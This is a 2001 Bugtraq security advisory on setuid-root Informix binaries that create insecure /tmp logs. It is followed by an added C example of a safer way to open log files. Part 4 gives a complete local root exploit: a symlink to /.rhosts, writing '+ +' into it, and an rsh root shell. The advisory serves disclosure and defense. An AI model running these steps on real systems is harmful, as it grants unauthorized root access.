From:	 s96192@ce.hannam.ac.kr
To:	 bugtraq@securityfocus.com
Subject: [ Hackerslab bug_paper ] Informix-SQL application vulnerability
Date:	 Tue, 4 Sep 2001 22:18:47 +0900 (KST)

==============================================================================

       [ Hackerslab bug_paper ] Informix-SQL application vulnerability

==============================================================================

File   : Informix-SQL application

SYSTEM : Systems running Informix

INFO :

There is a vulnerability in the Informix-SQL application which allows local
users to create any file with root privilege:

PART 1 :
$ id
uid=500 (informix) gid=120 (informix) groups=1000(loveyou)
$ umask 0000
$ cd ~informix/bin    # Informix HOME directory
$ ./onshowaudit
INFORMIX-SQL Version 7.31.UC5   
$ ls -al onbar_d ondblog onsmsync onsrvapd
-rwsr-sr-x   1 root     informix 2234104 Nov 18  1999 onbar_d
-rwsr-sr-x   1 root     informix 2219456 Nov 18  1999 ondblog
-rwsr-sr-x   1 root     informix 2284972 Apr 10  2000 onsmsync
-rwsr-sr-x   1 root     informix   39144 Nov 18  1999 onsrvapd

$ ./onbar_d    # or ./ondblog, or ./onsmsync
$ ls -al /tmp/bar*
-rw-rw----   1 root     informix     557 Aug 29 17:26 /tmp/bar_act.log
-rw-rw----   1 root     informix       0 Aug 29 17:26 /tmp/bar_dbug.log


PART 2:
$ ./onsrvapd
$ ls -al /tmp/ons*
-rw-rw-rw-   1 root     informix     141 Aug 29 17:38 /tmp/onsnmp.(hostname).log
-rw-rw-rw-   1 informix informix     319 Aug 29 17:38 /tmp/onsrvapd.log

PART 3:

$ ./snmpdm
$ ls -al /tmp/snmpd.log
-rwxrwxrwx   1 root     root        1085 Aug 29 17:43 /tmp/snmpd.log


PART 4:
loveyou@dogfoot$ ln -s /.rhosts /tmp/onsbmp.dogfoot.log
loveyou@dogfoot$ ~informix/bin/onsrvapd &
loveyou@dogfoot$ ls -al /.rhosts
-rw-rw-rw-   1 root     informix     141 Aug 29 18:28 /.rhosts
loveyou@dogfoot$ echo "+ +" > /.rhosts
loveyou@dogfoot$ rsh -l root localhost csh -i
# whoami
root


SOLUTION :

Remove the setuid permission, contact your vendor and get a patch.
$ su -
# cd ~informix/bin
# chmod u-s onbar_d  ondblog  onsmsync  onsrvapd


==-------------------------------------------------------------------------------==
       ********
   *    **   **    *
 *      **   **      *
*       ******       *                                               Kim Yong-Jun
 *      **   **      *                                     loveyou@hackerslab.org
   *    **   **    *                                 [  http://www.hackerslab.org ]
       ********            HACKERSLAB (C)  since 1999
==-------------------------------------------------------------------------------==
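
How a privileged program can create its log file without following a planted symlink (PART 4) or inheriting the caller's umask (PART 2), as an added example that is not part of the original advisory and is not Informix code. The helper name `open_log_safely` and the sample path are hypothetical.

```c
/* Added example: open_log_safely() is a hypothetical helper, not Informix code. */
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L   /* exposes O_NOFOLLOW and fchmod() */
#endif
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>

/* Open (or create) a log file for appending from a privileged process.
 * Returns a file descriptor, or -1 with errno set. */
int open_log_safely(const char *path)
{
    struct stat st;
    /* O_NOFOLLOW: refuse (ELOOP on Linux) if the final path component is a
     * symlink, so a link planted in /tmp cannot redirect the write.
     * Mode 0600 is explicit: umask can only clear bits, never add them. */
    int fd = open(path, O_WRONLY | O_APPEND | O_CREAT | O_NOFOLLOW, 0600);
    if (fd < 0)
        return -1;
    /* Inspect the object actually opened; fstat() on the fd cannot be raced. */
    if (fstat(fd, &st) != 0)
        goto reject;
    if (!S_ISREG(st.st_mode) ||      /* no FIFOs or device nodes */
        st.st_nlink != 1 ||          /* no hard link onto another file */
        st.st_uid != geteuid())      /* not pre-created by another user */
        goto reject;
    /* A file left by an earlier run may be too permissive: tighten it. */
    if ((st.st_mode & 07777) != 0600 && fchmod(fd, 0600) != 0)
        goto reject;
    return fd;
reject:
    close(fd);
    errno = EPERM;
    return -1;
}

int main(void)
{
    int fd = open_log_safely("/tmp/example_app.log");  /* constructed path */
    if (fd < 0) { perror("open_log_safely"); return 1; }
    if (write(fd, "started\n", 8) != 8) perror("write");
    close(fd);
    return 0;
}
```

`O_NOFOLLOW` only guards the last path component, so the directory holding the log must itself not be writable by untrusted users, or must be sticky as `/tmp` is.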